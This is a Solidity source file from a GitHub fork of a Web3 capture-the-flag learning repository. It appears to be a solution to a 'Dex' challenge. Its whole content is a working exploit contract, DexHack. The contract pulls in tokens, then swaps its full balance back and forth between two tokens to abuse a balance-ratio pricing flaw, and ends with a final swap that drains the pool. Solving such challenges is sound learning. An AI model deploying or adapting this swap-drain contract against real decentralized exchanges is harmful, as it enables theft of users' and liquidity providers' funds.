forked from DeFiHackLabs/Web3-CTF-Intensive-CoLearning
-
Notifications
You must be signed in to change notification settings - Fork 0
/
dex_hack.sol
33 lines (28 loc) · 1.38 KB
/
dex_hack.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {IERC20} from "openzeppelin-contracts/token/ERC20/IERC20.sol";
interface IDex {
function swap(address from, address to, uint amount) external;
function approve(address spender, uint amount) external;
function balanceOf(address token, address account) external view returns (uint);
function token1() external returns (address);
function token2() external returns (address);
}
contract DexHack {
address public target;
constructor(address _target) payable {
target = _target;
}
function hack() external {
(address token1, address token2) = (IDex(target).token1(), IDex(target).token2());
IERC20(token1).transferFrom(msg.sender, address(this), 10);
IERC20(token2).transferFrom(msg.sender, address(this), 10);
IDex(target).approve(address(target), type(uint).max);
IDex(target).swap(token1, token2, IDex(target).balanceOf(token1, address(this)));
IDex(target).swap(token2, token1, IDex(target).balanceOf(token2, address(this)));
IDex(target).swap(token1, token2, IDex(target).balanceOf(token1, address(this)));
IDex(target).swap(token2, token1, IDex(target).balanceOf(token2, address(this)));
IDex(target).swap(token1, token2, IDex(target).balanceOf(token1, address(this)));
IDex(target).swap(token2, token1, 45);
}
}